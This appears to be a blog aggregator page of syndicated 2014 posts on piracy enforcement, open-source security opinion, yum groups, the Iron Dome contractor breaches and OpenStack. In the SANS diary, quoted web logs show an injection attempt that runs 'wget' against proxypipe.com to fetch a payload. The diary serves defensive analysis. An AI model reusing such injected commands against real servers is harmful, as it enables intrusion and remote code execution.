Posts tagged ‘Other’

TorrentFreak: Block The Pirate Bay Within 3 Days, Austrian ISPs Told

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

pirate bayKino.to, one of Germany’s largest illegal streaming portals, was shut down during 2011 following the largest law enforcement action against of its type in Europe. But even with the site long gone the disruption it caused is about to affect The Pirate Bay and two other major sites.

Just a month before Kino.to was dismantled in June 2011, Austrian ISP ‘UPC’ was served with a preliminary injunction ordering it to block subscriber access to the site. Verein für Anti-Piraterie der österreichischen Film und Videobranche (VAP) – the anti-piracy association of the Austrian film and video industry – had been on the warpath since 2010 and had finally got their way after UPC refused to comply voluntarily.

But would blocking the site be legal? UPC insisted that it couldn’t be held responsible for a site it had nothing to do with. The ISP also maintained that there had been no court ruling determining that UPC customers who accessed Kino.to were breaking the law.

To settle the matter once and for all the Austrian Supreme Court asked the European Court of Justice to clarify whether a company that provides Internet access to people using an illegal website could be required to block that site. On March 27, 2014, the ECJ handed down its decision.

On UPC’s first point the Court said that EU law does not require a specific relationship between the person infringing copyright and the intermediary against whom any injunction had been issued. On the second point the Court said that proof of illegality was not necessary as the law exists not only to bring an end to infringement, but also to prevent it.

The key point of the ruling was that ISPs can indeed be required to block access to infringing sites provided that injunctions are both balanced and proportional. As a result, earlier this month Austria’s Supreme Court found that the blockade against Kino.to, even though the site is long dead, was correctly applied.

On the back of this ruling, this week VAP wrote to several local ISPs, UPC included, demanding a new blockade of three domains – ThePirateBay.se, Movie4K.to and Kinox.to, a site that took over from Kino.to.

“Letters dated yesterday have been sent to four large ISPs containing a request to block a small number of websites,” VAP Managing Director Werner Müller told Future Zone.

On behalf of three local movie companies (Allegro Film, Wega Film and Epo Film) VAP has requested IP address and DNS blocks of the three sites but has given the ISPs very little time in which to carry them out, by this Friday August 1, to be exact.

The Association of Internet Service Providers Austria (ISPA) feels the deadline is far too restrictive.

“The period given to the providers to act is ludicrously short. We see this as very problematic. Extreme pressure is being exerted,” Secretary General Maximilian Schubert said.

“Two working days during the holiday season is just too little. To implement this by Friday we deem too difficult.”

Interestingly, Schubert also sees differences between The Pirate Bay and the pair of streaming portals listed in VAP’s blocking request.

“There is also legal content on The Pirate Bay,” Schubert said.

Discussions between VAP and the ISPs are scheduled for later in the week, so whether the anti-piracy group will get its way immediately will remain to be seen. They’ve waited years already, another few days shouldn’t make much difference.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Police Begin Placing Warning Adverts on ‘Pirate’ Sites

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

cityoflondonpoliceFor a year, City of London Police have been working with the music and movie industries on initiatives to cut down on the consumption of pirated content online.

Operation Creative employs a multi-pronged approach, seeking to educate consumers while making life difficult for sites that operate unlicensed services.

Many unauthorized sites generate revenue from advertising, so the Police Intellectual Property Crime Unit (PIPCU) informs potential advertisers on how to keep their promotions away, thus depriving sites of cash. Another key aim is to stop users from getting the impression that pirate sites have “big brand” support when household names are seen advertising.

Today, PIPCU officially announced the launch of another angle to their ad strategy. As reported by TF in April, police are now placing their own ads on pirate sites to warn users that the site they’re using has been reported.

“This new initiative is another step forward for the unit in tackling IP crime and disrupting criminal profits,” said Head of PIPCU, DCI Andy Fyfe.

“Copyright infringing websites are making huge sums of money though advert placement, therefore disrupting advertising on these sites is crucial and this is why it is an integral part of Operation Creative.”

Sample police ad

As shown below, the BBC has published a PIPCU-supplied screenshot of how the ads look on an unauthorized MP3 site known as Full-Albums.net.

PIPCU-ad-mp3

In our tests we couldn’t replicate the banners, despite dozens of refreshes, so it’s possible the site took action to remove them. Needless to say, we did see other advertising, and very interesting it was too.

Ironically, by clicking album links on Full-Albums we were presented with ads from BearShare, a music service that struck deals with the RIAA in the last decade. As can be seen from the screenshot below, the service places the major labels’ logos prominently to attract customers, even when accessed from a UK IP address.

Bear-ads

TF checked with the BPI on the licensing status of the service in the UK and will update this article when their statement arrives, but as can be seen from this quote from the BearShare site, they claim to be legal.

“Using BearShare is 100% legal. The service employs state of the art filtering technology, and is approved by the major record labels and RIAA. Downloading from BearShare is entirely legal, and will not get you in any kind of trouble whatsoever,” the service says.

If Bearshare is licensed, this raises the possibility that the labels are indirectly financing ads on pirate sites themselves, something they’ll want to quickly remedy.

Ads on other sites

PIPCU, who have partnered with content verification technology provider ‘Project Sunblock’ to place the warning ads, say their banners are “now replacing a wide range of legitimate brand adverts on infringing websites.”

So, determined to find examples of the police advertising, we began moving through sites with the most copyright complaints as per Google’s Transparency Report.

Unfortunately we were unable to view a single PIPCU banner. However, as shown in the screenshot below, we did get some interesting results on MP3Juices, a site for which the BPI has sent 1,206,000+ takedowns to Google.

Juicebet

Skybet is not only a subsidiary of broadcasting giant BSkyB, but the company is also a leading member of the Federation Against Copyright Theft. In turn, FACT is a key Operation Creative partner. While Sky Bet wasn’t the only gambling advertiser on the site, this ad placement means that BSkyB are currently helping to finance the very sites that PIPCU are trying to close down.

There’s absolutely no suggestion that Sky or the major labels via Bearshare are deliberately trying to finance pirate sites, but the above examples show just how difficult it’s going to be to keep major brand’s advertising off these sites, even when they are acutely aware of the problems.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Errata Security: Cliché: open-source is secure

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Some in cybersec keep claiming that open-source is inherently more secure or trustworthy than closed-source. This is demonstrably false.

Firstly, there is the problem of usability. Unusable crypto isn’t a valid option for most users. Most would rather just not communicate at all, or risk going to jail, rather than deal with the typical dependency hell of trying to get open-source to compile. Moreover, open-source apps are notoriously user-hostile, which is why the Linux desktop still hasn’t made headway against Windows or Macintosh. The reason is that developers blame users for being stupid for not appreciating how easy their apps are, whereas Microsoft and Apple spend $billions in usability studies actually listening to users. Desktops like Ubuntu are pretty good — but only when they exactly copy Windows/Macintosh. Ubuntu still doesn’t invest in the usability studies that Microsoft/Apple do.
The second problem is deterministic builds. If I want to install an app on my iPhone or Android, the only usable way is through their app stores. This means downloading the binary, not the source. Without deterministic builds, there is no way to verify the downloaded binary matches the public source. The binary may, in fact, be compiled from different source containing a backdoor. This means a malicious company (or an FBI NSL letter) can backdoor open-source binaries as easily as closed-source binaries.
The third problem is code-review. People trust open-source because they can see for themselves if it has any bugs. Or, if not themselves, they have faith that others are looking at the code (“many eyes makes bugs shallow”). Yet, this rarely happens. We repeatedly see bugs giving backdoor access (‘vulns’) that remain undetected in open-source projects for years, such as the OpenSSL Heartbleed bug. The simple fact is that people aren’t looking at open-source. Those qualified to review code would rather be writing their own code. The opposite is true for closed-source, where they pay people to review code. While engineers won’t review code for fame/glory, they will for money. Given two products, one open and the other closed, it’s impossible to guess which has had more “eyes” looking at the source — in many case, it’s the closed-source that has been better reviewed.
What’s funny about this open-source bigotry is that it leads to very bad solutions. A lot of people I know use the libpurple open-source library and the jabber.ccc.de server (run by CCC hacking club). People have reviewed the libpurple source and have found it extremely buggy, and chat apps don’t pin SSL certificates, meaning any SSL encryption to the CCC server can easily be intercepted. In other words, the open-source alternative is known to be incredibly insecure, yet people still use it, because “everyone knows” that open-source is more secure than closed-source.
Wickr and SilentCircle are two secure messaging/phone apps that I use, for the simple fact that they work both on Android and iPhone, and both are easy to use. I’ve read their crypto algorithms, so I have some assurance that they are doing things right. SilentCircle has open-sourced part of their code, which looks horrible, so it’s probable they have some 0day lurking in there somewhere, but it’s really no worse than equivalent code. I do know that both companies have spent considerable resources on code review, so I know at least as many “eyes” have reviewed their code as open-source. Even if they showed me their source, I’m not going to read it all — I’ve got more important things to do, like write my own source.
Thus, I see no benefit to open-source in this case. Except for Cryptocat, all the open-source messaging apps I’ve used have been buggy and hard to use. But, you can easily change my mind: just demonstrate an open-source app where more eyes have reviewed the code, or a project that has deterministic builds, or a project that is easier to use, or some other measurable benefit.
Of course, I write this as if the argument was about the benefits of open-source. We all know this doesn’t matter. As the EFF teaches us, it’s not about benefits, but which is ideologically pure; that open-source is inherently more ethical than closed-source.

SANS Internet Storm Center, InfoCON: green: Interesting HTTP User Agent “chroot-apach0day”, (Mon, Jul 28th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Our reader Robin submitted the following detect:

I’ve got a site that was scanned this morning by a tool that left these entries in the logs:
[HTTP_USER_AGENT] => chroot-apach0day
[HTTP_REFERRER] => /xA/x0a/x05
[REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day  

The URL that appears to be retrieved does not exist, even though the domain does.

In our own web logs, we have seen a couple of similar requests:

162.253.66.77 – - [28/Jul/2014:05:07:15 +0000] “GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day” “-”
162.253.66.77 – - [28/Jul/2014:18:48:36 +0000] “GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day” “-”
162.253.66.77 – - [28/Jul/2014:20:04:07 +0000] “GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day-HIDDEN BINDSHELL-ESTAB” “-”

If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn’t look like this is indeed an “Apache 0 Day” 

There are a couple other security related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Linux How-Tos and Linux Tutorials: How to Simplify Linux Package Installation With Yum Groups

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Don Crawley. Original post: at Linux How-Tos and Linux Tutorials

Most Linux admins are aware of the yum (Yellow Dog Updater Modified) utility for package management in Red Hat-based distros such as RHEL, CentOS, and Fedora. Few, however, are aware of the power, benefits, and utility of yum groups. In addition to installing individual packages, yum can also install and manage groups of packages through its groupinstall feature, a part of yum groups. By using yum groups, it’s not necessary for you to manually install related packages individually. For example, the yum group “Web Server” not only installs httpd, it also installs crypto-utils, httpd-manual, mod_perl, mod_ssl, mod_wsgi, and webalizer, plus all their dependencies.

The following tutorial is based on CentOS 6.5 and should work with other versions of Red Hat-based distros. Older versions may require that you install yum-utils in order to use yum groups.

A free companion video for this guide is available at http://youtu.be/0ab17Sh-LM0.

Package Management through Groups

In the following steps, you will learn how to list available groups, install a group, and remove a group.

  1. Use the command yum grouplist to see a list of all the available package groups.

yum grouplist

  1. Now, add a grep filter to look for groups related to “Web” by using the command yum grouplist | grep Web (Remember, everything in Linux is case-sensitive.)

yum grouplist grep

  1. Use yum groups to install the Web Server group with the following command:
    yum groupinstall “Web Server”
    (Notice the use of quotation marks around the package name since it consists of two words. Also, notice that the two words are capitalized.) Stand up and stretch while this installation takes place. It has to download and install 34 packages which takes about a minute, depending on your connection speed and your computer’s speed. Do some shoulder rolls and neck rolls while this takes place. Seriously.

yum groupinstall

  1. When it’s finished, as usual, it will return a command prompt. In the following screen capture, you can see all the packages it installed. Obviously, even with automatic dependency installation, this is still a lot less work than installing the packages manually.

yum groupinstall packages

  1. Now, remove the group with the command yum groupremove “Web Server”

yum groupremove

As with yum groupinstall, the process of uninstalling packages is much easier with yum groupremove.

An obvious disadvantage to using yum groups is that it installs a lot of packages, some of which you may not need or want. Yum groups, however, is a great way to teach yourself about various packages that you might want to use on a particular type of server. Ultimately, you’ll probably perform customized, manual package installations. During your learning process, yum groups can provide many insights into available packages.

Excerpted from the newly expanded and updated The Accidental Administrator: Linux Server Step-by-Step Configuration Guide, 2nd Edition by Don R. Crawley.

Don R. Crawley is author of The Accidental Administrator series of books for IT professionals including The Accidental Administrator: Linux Server Step-by-Step Configuration Guide and president of soundtraining.net a Seattle, Washington-based IT publishing and training firm. He is a veteran IT guy with over 40 years’ experience in technology for the workplace. He holds multiple certifications including Linux+ and IPv6 Silver Engineer. He tweets @doncrawley and blogs at www.soundtraining.net/blog. Don can be reached at (206) 988-5858, www.soundtraining.net, or don@soundtraining.net.

TorrentFreak: Ford and General Motors Sued Over ‘CD Ripping Cars’

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

ford-jukeA quarter century ago the music industry was confronted with a new threat – cassette tape recorders.

These devices were able to make “near perfect” copies of any audio recording and the RIAA and others feared this would be the end of the recorded music industry.

The record labels took their fears to Congress, which eventually resulted in the Audio Home Recording Act (AHRA) of 1992. Under this law importers and manufacturers have to pay royalties on “digital audio recording devices,” among other things.

The legislation also applies to some newer recording devices common today, which is now causing trouble for Ford and General Motors. Both companies ship cars with the ability to rip CDs onto internal hard drives and according to a coalition of artists and record companies this violates copyright law.

The Alliance of Artists and Recording Companies (AARC), which lists major record labels and 300,000 artists among its members, filed a class action lawsuit on Friday in which they demand millions of dollars in compensation.

TorrentFreak obtained a copy of the complaint (pdf) which states that Ford’s “Jukebox” device and General Motor’s “Hard Drive Device” allow consumers to rip CDs onto an internal hard drive. According to the music group these devices fall under the Audio Home Recording Act and the car companies are therefore required to pay royalties.

Thus far, neither Ford nor General Motors has complied with any requirements of the Act. Both companies have sold cars with these devices for several years on a variety of models including the Lincoln MKS, Ford Taurus, Ford Explorer, Buick LaCrosse, Cadillac SRX, Chevrolet Volt, and GMC Terrain.

In addition to the two car companies, the lawsuit also targets their technology partners Denso and Clarion. Commenting on the dispute the AARC notes that a class action lawsuit was unavoidable.

“Twenty-two years ago, cooperation between music creators and device manufacturers resulted in legislation that led to a digital electronics revolution. But having reaped the benefits of this bargain, Ford, GM, Denso, and Clarion have now decided to ignore their obligations to music creators and declare themselves above the law,” AARC Executive Director Linda Bocchi comments

“While no one likes litigation, Ford, GM, Denso, and Clarion have stonewalled long enough, and we are determined to collect the royalties our members – and all artists and music creators with rights under the AHRA – are owed,” Bocchi adds.

The artists and record labels are looking for both actual and statutory damages, which could amount to hundreds of millions of dollars. In addition, they want to prevent the manufacturers from selling these unauthorized devices in their cars.

The case will prove to be an interesting test of the legality of “recording” devices in car entertainment systems. As is usually true, the law is not as black and white as AARC’s complaint states.

For example, the lawsuit doesn’t mention that the Audio Home Recording Act includes various exemptions for personal use and for recording equipment that’s part of a larger device, such as CD-burners in computers.

It’s now up to the court to decide how cars fit into this picture.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Hackers Plundered Israeli Defense Firms that Built ‘Iron Dome’ Missile Defense System

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Three Israeli defense contractors responsible for building the “Iron Dome” missile shield currently protecting Israel from a barrage of rocket attacks were compromised by hackers and robbed of huge quantities of sensitive documents pertaining to the shield technology, KrebsOnSecurity has learned.

The never-before publicized intrusions, which occurred between 2011 and 2012, illustrate the continued challenges that defense contractors and other companies face in deterring organized cyber adversaries and preventing the theft of proprietary information.

The Iron Dome anti-missile system in operation, 2011.

A component of the ‘Iron Dome’ anti-missile system in operation, 2011.

According to Columbia, Md.-based threat intelligence firm Cyber Engineering Services Inc. (CyberESI), between Oct. 10, 2011 and August 13, 2012, attackers thought to be operating out of China hacked into the corporate networks of three top Israeli defense technology companies, including Elisra Group, Israel Aerospace Industries, and Rafael Advanced Defense Systems.

By tapping into the secret communications infrastructure set up by the hackers, CyberESI determined that the attackers exfiltrated large amounts of data from the three companies. Most of the information was intellectual property pertaining to Arrow III missiles, Unmanned Aerial Vehicles (UAVs), ballistic rockets, and other technical documents in the same fields of study.

Joseph Drissel, CyberESI’s founder and chief executive, said the nature of the exfiltrated data and the industry that these companies are involved in suggests that the Chinese hackers were looking for information related to Israel’s all-weather air defense system called Iron Dome.

The Israeli government has credited Iron Dome with intercepting approximately one-fifth of the more than 2,000 rockets that Palestinian militants have fired at Israel during the current conflict. The U.S. Congress is currently wrangling over legislation that would send more than $350 million to Israel to further development and deployment of the missile shield technology. If approved, that funding boost would make nearly $1 billion from the United States over five years for Iron Dome production, according to The Washington Post.

Neither Elisra nor Rafael responded to requests for comment about the apparent security breaches. A spokesperson for Israel Aerospace Industries brushed off CyberESI’s finding, calling it “old news.” When pressed to provide links to any media coverage of such a breach, IAI was unable to locate or point to specific stories. The company declined to say whether it had alerted any of its U.S. industry partners about the breach, and it refused to answer any direct questions regarding the incident.

arrow3“At the time, the issue was treated as required by the applicable rules and procedures,” IAI Spokeswoman Eliana Fishler wrote in an email to KrebsOnSecurity. “The information was reported to the appropriate authorities. IAI undertook corrective actions in order to prevent such incidents in the future.”

Drissel said many of the documents that were stolen from the defense contractors are designated with markings indicating that their access and sharing is restricted by International Traffic in Arms Regulations (ITAR) — U.S. State Department controls that regulate the defense industry. For example, Drissel said, among the data that hackers stole from IAI is a 900-page document that provides detailed schematics and specifications for the Arrow 3 missile.

“Most of the technology in the Arrow 3 wasn’t designed by Israel, but by Boeing and other U.S. defense contractors,” Drissel said. “We transferred this technology to them, and they coughed it all up. In the process, they essentially gave up a bunch of stuff that’s probably being used in our systems as well.”

WHAT WAS STOLEN, AND BY WHOM?

According to CyberESI, IAI was initially breached on April 16, 2012 by a series of specially crafted email phishing attacks. Drissel said the attacks bore all of the hallmarks of the “Comment Crew,” a prolific and state-sponsored hacking group associated with the Chinese People’s Liberation Army (PLA) and credited with stealing terabytes of data from defense contractors and U.S. corporations.

Image: FBI

Image: FBI

The Comment Crew is the same hacking outfit profiled in a February 2013 report by Alexandria, Va. based incident response firm Mandiant, which referred to the group simply by it’s official designation — “P.L.A. Unit 61398.” In May 2014, the U.S. Justice Department charged five prominent military members of the Comment Crew with a raft of criminal hacking and espionage offenses against U.S. firms.

Once inside the IAI’s network, Comment Crew members spent the next four months in 2012 using their access to install various tools and trojan horse programs on systems throughout company’s network and expanding their access to sensitive files, CyberESI said. The actors compromised privileged credentials, dumped password hashes, and gathered system, file, and network information for several systems. The actors also successfully used tools to dump Active Directory data from domain controllers on at least two different domains on the IAI’s network.

All told, CyberESI was able to identify and acquire more than 700 files — totaling 762 MB total size — that were exfiltrated from IAI’s network during the compromise. The security firm said most of the data acquired was intellectual property and likely represented only a small portion of the entire data loss by IAI.

“The intellectual property was in the form of Word documents, PowerPoint presentations, spread sheets, email messages, files in portable document format (PDF), scripts, and binary executable files,” CyberESI wrote in a lengthy report produced about the breaches.

“Once the actors established a foothold in the victim’s network, they are usually able to compromise local and domain privileged accounts, which then allow them to move laterally on the network and infect additional systems,” the report continues. “The actors acquire the credentials of the local administrator accounts by using hash dumping tools. They can also use common local administrator account credentials to infect other systems with Trojans. They may also run hash dumping tools on Domain Controllers, which compromises most if not all of the password hashes being used in the network. The actors can also deploy keystroke loggers on user systems, which captured passwords to other non-Windows devices on the network.”

The attackers followed a similar modus operandi in targeting Elisra, a breach which CyberESI says began in October 2011 and persisted intermittently until July 2012. The security firm said the attackers infiltrated and copied the emails for many of Elisra’s top executives, including the CEO, the chief technology officer (CTO) and multiple vice presidents within the company.

CyberESI notes it is likely that the attackers were going after persons of interest with access to sensitive information within Elisra, and/or were gathering would be targets for future spear-phishing campaigns.

Drissel said like many other such intellectual property breaches the company has detected over the years, neither the victim firms nor the U.S. government provided any response after CyberESI alerted them about the breaches at the time.

“The reason that nobody wants to talk about this is people don’t want to re-victimze the victim,” Drissel said. “But the real victims here are the people on the other end who are put in harm’s way because of poor posture on security and the lack of urgency coming from a lot of folks on how to fix this problem. So many companies have become accustomed to low-budget IT costs. But the reality is that if you have certain sensitive information, you’ve got to spend a certain amount of money to secure it.”

ANALYSIS

While some of the world’s largest defense contractors have spent hundreds of millions of dollars and several years learning how to quickly detect and respond to such sophisticated cyber attacks, it’s debatable whether this approach can or should scale for smaller firms.

Michael Assante, project lead for Industrial Control System (ICS) and Supervisory Control and Data Acquisition (SCADA) security at the SANS Institute, said although there is a great deal of discussion in the security industry about increased information sharing as the answer to detecting these types of intrusions more quickly, this is only a small part of the overall solution.

“We collectively talk about all of the things that we should be doing better — that we need to have better security policies, better information sharing, better detection, and we’re laying down the tome and saying ‘Do all of these things’,” Assante said. “And maybe a $100 million security program can do all these things well or make progress against these types of attacks, but that 80-person defense contractor? Not so much.

Assante said most companies in the intelligence and defense industries have gotten better at sharing information and at the so-called “cyber counter-intelligence” aspect of these attacks: Namely, in identifying the threat actors, tactics and techniques of the various state-sponsored organizations responsible. But he noted that most organizations still struggle with the front end of problem: Identifying the original intrusion and preventing the initial compromise from blossoming into a much bigger problem.

“I don’t think we’ve improved much in that regard, where the core challenges are customized malware, persistent activity, and a lot of noise,” Assante said. “Better and broader notification [by companies like CyberESI] would be great, but the problem is that typically these notifications come after sensitive data has already been exfiltrated from the victim organization. Based on the nature of advanced persistent threats, you can’t beat that time cycle. Well, you might be able to, but the amount of investment needed to change that is tremendous.”

Ultimately, securing sensitive systems from advanced, nation-state level attacks may require a completely different approach. After all, as Einstein said, “We cannot solve our problems with the same thinking we used when we created them.”

Indeed, that appears to be the major thrust of a report released this month by Richard J. Danzig, a board member of the Center for New American Security. In “Surviving on a Diet of Poison Fruit,” (PDF) Danzig notes that defensive efforts in major mature systems have grown more sophisticated and effective.

“However, competition is continuous between attackers and defender,” he wrote. “Moreover, as new information technologies develop we are not making concomitant investments in their protection. As a result, cyber insecurities are generally growing, and are likely to continue to grow, faster than security measures.”

In his conclusion, Danzig offers a range of broad (and challenging) suggestions, including this gem, which emphasizes placing a premium on security over ease-of-use and convenience in mission-critical government systems:

“For critical U.S. government systems, presume cyber vulnerability and design organizations, operations and acquisitions to compensate for this vulnerability. Do this by a four-part strategy of abnegation, use of out-of-band architectures, diversification and graceful degradation. Pursue the first path by stripping the ‘nice to have’ away from the essential, limiting cyber capabilities in order to minimize cyber vulnerabilities. For the second, create non-cyber interventions in cyber systems. For the third, encourage different cyber dependencies in different systems so single vulnerabilities are less likely to result in widespread failure or compromise. And for the fourth, invest in discovery and recovery capabilities. To implement these approaches, train key personnel in both operations and security so as to facilitate self-conscious and well- informed tradeoffs between the security gains and the operational and economic costs from pursuing these strategies.”

Source: Center for New American Security

Source: Center for New American Security

TorrentFreak: “Scared” Pirates Delayed Release of Expendables 3

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Last week saw the leak online of the brand new Expendables movie.

Earmarked for an August 15 U.S. release, Expendables 3 leaked in near DVD quality a full two weeks ahead. The timing and quality combined to make the leak one of the most prominent in recent years.

While the original sources of these leaks are nearly always shrouded in mystery, once made publicly available on sites like The Pirate Bay they are anyone’s for download.

Originally it was believed that Pirate Bay releaser Drarbg uploaded the first public torrent, but that was not the case. Flying under the radar a hugely less popular torrent (still only with a handful of seeds) actually preceded it by almost 20 minutes.

exp-charles

It’s certainly feasible that another release preceded even this one, but with torrents on sites other than Pirate Bay regularly deleted due to copyright complaints, it’s now too late for any certainty.

It’s also impossible to say how many people were in the chain after the leak and before the first public torrent upload, but numerous public sources (including RARBG themselves) are now pointing to postings on 4chan as indicating the start of events.

The thread is right here and obviously everything happened in public. The postings don’t specifically mention the title of the movie but a source close to the situation assures TF that the chat does indeed refer to The Expendables 3.

4chan-1

Less than two hours after his initial posting on July 15, ‘Anonymous’ was back on 4chan with an update.

“I am in contact with a release group that works with private trackers. They asked me for proof of what I had and I took pictures with a written timestamp of the disc in and out of the box,” he wrote.

“I dumped them into some special submission link they had and they will get back to me. I’m just waiting in a secured IRC room for them to get back to me once the staff takes a look.”

Precisely what happened after then is a mystery (as is the leaker’s apparent disregard for security by posting in public) but a source informs TF that whoever obtained the copy knew they had something hot – perhaps too hot.

“We know that the leak was back then, around July 15, but everyone was scared to leak it. Most private groups had it for more than 10 days, but again they were scared to leak it,” TF was told.

After the leaked copy was allegedly handed over July 15, the comments of ‘Anonymous’ as he returned to 4chan predicted the events of last Thursday.

“Keep an eye out for the leak. No telling how long this will take, but I’m sure it will make its way to public trackers due to the demand for it,” he wrote.

Interestingly, although initial demand for The Expendables 3 was brisk, downloads now sit at an estimated 500,000, and it’s currently less popular on file-sharing networks than “Divergent” which was released on the same day.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Top 10 Most Pirated Movies of The Week – 07/28/14

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

expendablesThis week we have three newcomers in our chart.

The Expendables 3, which leaked several weeks before the official premiere, is the most downloaded movie this week.

The data for our weekly download chart is estimated by TorrentFreak, and is for informational and educational reference only. All the movies in the list are BD/DVDrips unless stated otherwise.

RSS feed for the weekly movie download chart.

Ranking (last week) Movie IMDb Rating / Trailer
torrentfreak.com
1 (…) The Expendables 3 (DVDscr) ?.? / trailer
2 (…) Divergent 7.2 / trailer
3 (2) The Other Woman 6.5 / trailer
4 (1) Need For Speed 7.1 / trailer
5 (8) The Amazing Spider-Man 2 7.4 / trailer
6 (5) Transformers: Age of Extinction (HDTS) 6.3 / trailer
7 (4) Noah 6.3 / trailer
8 (…) Dawn of the Planet of the Apes (TS) 8.3 / trailer
9 (3) Transcendence 6.4 / trailer
10 (…) Hercules Reborn 3.4 / trailer

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Anchor Managed Hosting: OpenStack – the open cloud

This post was syndicated from: Anchor Managed Hosting and was written by: Bart Thomas. Original post: at Anchor Managed Hosting

suitcase-cloudNo one likes vendor lock-in. It’s an artificial limitation on technology, designed to benefit the vendor, not the customer.

The restrictions may seem insignificant on day one, when the technology may appear to be the best option currently available. But the world keeps spinning and technology keeps evolving, until you’re stuck with a platform that cannot appropriately adapt to suit your new situation without considerable expense.

The big, proprietary public cloud vendors of today didn’t invent vendor lock-in, but they certainly know how to work it to their advantage.

Cloud Computing isn’t owned by anyone. Companies locked into a proprietary cloud service lose the flexibility  needed to make good business decisions; making vendor lock-in a real threat to your competitive advantage. What might put you ahead one day can hold you back the next.

Open Source standards

Cloud computing may have ushered in huge benefits to businesses everywhere, powering many of the world’s biggest websites and services. But until OpenStack arrived, cloud technology still struggled to address two of the most important customer expectations — freedom of choice and workload portability.

OpenStack is the only cloud platform that threatens to break the market stranglehold of the proprietary cloud vendors. In case you hadn’t noticed, Microsoft, Amazon and Google aren’t big on transparency, interoperability and open standards.

Why should you care about open standards? Because it is risky to buy services from a single vendor. Vendor-owned ecosystems often drift into irrelevancy.

Before OpenStack came on the scene, one cloud platform wasn’t necessarily compatible, or even comparable, with another. Each solved the various software problems in different ways, requiring different code modifications and different architecture to achieve the best results.

And that meant it wasn’t so easy to switch providers as your needs changed.

“Oh, but you can’t take that with you”

It doesn’t matter which electricity supplier you use to power your television. Simply plug it into the wall and it’ll work just fine. Electricity is also sold by consumption, meaning you’re not paying for power when the television is switched off (except for that pesky standby light). However, your service levels, pricing, billing model and add on services may vary (“Would you like to bundle your gas supply with that?”).

If you’re unhappy with your current electricity supplier, it may still be a pain, but at least you can switch to another provider without having to buy a new television (freedom of choice) or wiping everything recorded on the DVR (workload portability).

Computing should offer the same consumption model and flexibility as energy, powering your website and online services while only charging for the capacity and resources you actually consume.

Your cloud, your rules

The open source movement is all about transparent code and greater compatibility. And the rapid rise of OpenStack means these open source standards and APIs are becoming accepted as the industry standard. The cloud industry is adapting to be more compatible with OpenStack, making it the natural default for any new cloud service.

And because OpenStack is the accepted standard, it immediately reduces the issues of workload portability and freedom of choice.

Not happy with your cloud provider’s service or pricing? Need an add-on service (such as Hadoop – which is also open source) not offered by your provider? Simply take your website, application or other workload and plug it in somewhere else.

If your organisation is considering a move to the cloud, it is no longer a question of “Should we look into OpenStack?” but instead, “Why on earth wouldn’t we?”

OpenStack puts the user back in control, not the vendor.

The post OpenStack – the open cloud appeared first on Anchor Managed Hosting.

TorrentFreak: Google Protects Chilling Effects From Takedown Notices

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

google-bayEach week many millions of DMCA-style copyright notices are sent to sites and services around the planet. Initially the process flew almost entirely under the radar, with senders and recipients dealing with complaints privately.

In 2001, that began to change with the advent of Chilling Effects, an archive created by activists who had become concerned that increasing volumes of cease-and-desist letters were having a “chilling effect” on speech.

In the decade-and-a-third that followed the archive grew to unprecedented levels, with giants such as Google and Twitter routinely sending received notices to the site for public retrieval.

However, while Chilling Effects strives to maintain free speech, several times a month rightsholders from around the world try to silence the archive in specific ways by asking Google to de-index pages from the site.

As can be seen from the tables below, Home Box Office has tried to de-index Chilling Effects pages 240 times, with Microsoft and NBC Universal making 99 and 65 attempts respectively.

Chilling1

The ‘problem’ for these copyright holders is two-fold. Firstly, Chilling Effects does indeed list millions of URLs that potentially link to infringing content. That does not sit well with copyright holders.

“Because the site does not redact information about the infringing URLs identified in the notices, it has effectively become the largest repository of URLs hosting infringing content on the internet,” the Copyright Alliance’s Sandra Aistars complained earlier this year.

However, what Aistars omits to mention is that Chilling Effects has a huge team of lawyers under the hood who know only too well that their archive receives protection under the law. Chilling Effects isn’t a pirate index, it’s an educational, informational, research resource.

Thanks to Google, which routinely throws out all attempts at removing Chilling Effects URLs from its indexes, we are able to see copyright holder attempts at de-indexing.

Earlier this month, for example, Wild Side Video and their anti-piracy partners LeakID sent this notice to Google aiming to protect their title “Young Detective Dee.” As shown below, the notice contained several Chilling Effects URLs.

chill2

Each URL links to other DMCA notices on Chilling Effects, each sent by rival anti-piracy outfit Remove Your Media on behalf of Well Go USA Entertainment. They also target “Young Detective Dee”. This is an interesting situation that offers the potential for an endless loop, with the anti-piracy companies reporting each others’ “infringing” links on Chilling Effects in fresh notices, each time failing to get them removed.

chilling3

